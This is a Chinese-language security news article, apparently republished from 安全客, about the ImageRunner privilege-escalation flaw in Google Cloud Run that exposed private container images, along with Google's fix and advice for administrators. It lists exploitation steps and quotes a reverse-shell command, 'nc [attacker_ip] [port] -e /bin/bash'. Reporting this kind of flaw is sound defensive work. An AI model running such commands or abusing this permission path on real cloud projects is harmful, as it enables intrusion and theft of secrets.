安全客 04月03日
紧急预警:Google Cloud Platform ImageRunner 权限提升漏洞可致敏感数据被访问
index_new5.html
../../../zaker_core/zaker_tpl_static/wap/tpl_guoji1.html

 

本文揭示了Google Cloud Platform(GCP)中的一个严重安全漏洞ImageRunner,该漏洞允许攻击者访问存储在Google Artifact Registry和Google Container Registry中的私有容器镜像。该漏洞存在于Cloud Run服务中,攻击者可通过控制特定权限的身份主体,更新Cloud Run服务并指定私有镜像,从而注入恶意指令获取敏感数据。Google已修复该漏洞,并建议云管理员加强权限管理、监控修订版本更新,以应对云安全挑战。

🛡️ ImageRunner漏洞影响GCP的Cloud Run服务,攻击者可利用该漏洞访问私有容器镜像。

🔨 攻击者利用拥有run.services.update和iam.serviceAccounts.actAs权限的身份主体,更新Cloud Run服务并指定私有镜像,注入恶意指令。

⚙️ Cloud Run的服务代理拥有拉取镜像的权限,攻击者“借用”此权限,导致攻击成功。

✅ Google已修复此漏洞,并要求创建或更新Cloud Run资源的主体拥有Artifact RegistryReader权限,以访问容器镜像。

💡 云管理员应遵循最小特权原则、监控修订版本更新,并考虑实施额外的安全控制措施,以应对云安全挑战。

Google Cloud Platform(GCP)中存在一个严重的安全漏洞,该漏洞原本可能使攻击者获取存储在 Google Artifact Registry 和 Google Container Registry 中的私有容器镜像。

这个被称为 “ImageRunner” 的漏洞已得到修复,但它凸显了一个令人担忧的权限提升途径,使敏感的云资源面临风险。

ImageRunner 漏洞

Tenable Research 报告称,该漏洞影响 Google Cloud Run,这是一项用于在无服务器环境中运行容器化应用程序的完全托管服务。

从本质上讲,该问题源于 Cloud Run 在容器部署过程中处理权限的方式。

对 Cloud Run 修订版本(run.services.update 和 iam.serviceAccounts.actAs)拥有编辑权限的身份主体,即便没有通常所需的注册中心权限(Storage Object Viewer 或 Artifact Registry Reader),也能够利用此漏洞访问私有容器镜像。

当用户部署一项 Cloud Run 服务时,会创建一个新的 “修订版本”,代表所部署服务的特定版本。

在此过程中,Cloud Run 依靠一个服务代理从注册中心拉取容器镜像。这个服务代理拥有提升后的权限,以便推动部署过程。

攻击利用方法

利用此漏洞的攻击者可以:

1.控制拥有 run.services.update 和 iam.serviceAccounts.actAs 权限的身份主体。

2.更新正在运行的 Cloud Run 服务,并编辑一个新的修订版本。

3.指定同一项目内的任何私有容器镜像。

4.注入恶意指令作为参数或命令。

例如,攻击者可以指定一个私有 “ncat” 镜像,并添加以下命令来建立反向 shell:nc [attacker_ip] [port] -e /bin/bash。

一旦执行,攻击者就能访问该容器,并可以检查其内容、提取机密信息或窃取敏感数据。

这种攻击能够得逞,是因为 Cloud Run 的服务代理(service-PROJECT_NUMBER@gcf-admin-robot.iam.gserviceaccount.com)拥有拉取镜像所需的权限,而攻击者实际上是 “借用” 了这一权限。

ImageRunner 漏洞例证了 Tenable Research 所称的 “Jenga®” 概念,即构建在其他服务之上的云服务会继承安全风险。如果一个底层服务遭到破坏,构建在其之上的服务也会变得脆弱。

这种漏洞模式在各大云服务提供商中都有出现,给试图保护云基础设施的安全团队带来了重大挑战。

Google 通过实施一项关键的安全控制措施来解决该漏洞:现在,创建或更新 Cloud Run 资源的主体需要获得明确的权限,才能访问正在部署的容器镜像。

具体而言,在使用 Artifact Registry 时,主体必须在包含容器镜像的项目或存储库上拥有 Artifact RegistryReader (roles/artifactregistry.reader)这一 IAM 角色。

该修复措施于 2025 年 1 月 28 日全面应用于生产环境,并且在 2024 年 11 月已提前通知受影响的项目、文件夹和组织所有者。

对云管理员的建议

使用 Google Cloud Platform 的组织应:

1.确保 IAM 权限遵循最小特权原则。

2.验证是否由拥有适当注册中心权限的身份主体执行所有 Cloud Run 部署操作。

3.监控 Cloud Run 修订版本的可疑更新情况。

4.考虑为容器部署实施额外的安全控制措施。

这个漏洞提醒我们,云安全需要保持警惕,防范在现代多服务架构中可能不会立即显现的复杂权限提升途径。

 

Fish AI Reader

Fish AI Reader

AI辅助创作,多种专业模板,深度分析,高质量内容生成。从观点提取到深度思考,FishAI为您提供全方位的创作支持。新版本引入自定义参数,让您的创作更加个性化和精准。

FishAI

FishAI

鱼阅,AI 时代的下一个智能信息助手,助你摆脱信息焦虑

联系邮箱 441953276@qq.com

相关标签

GCP ImageRunner 云安全 漏洞 Cloud Run
相关文章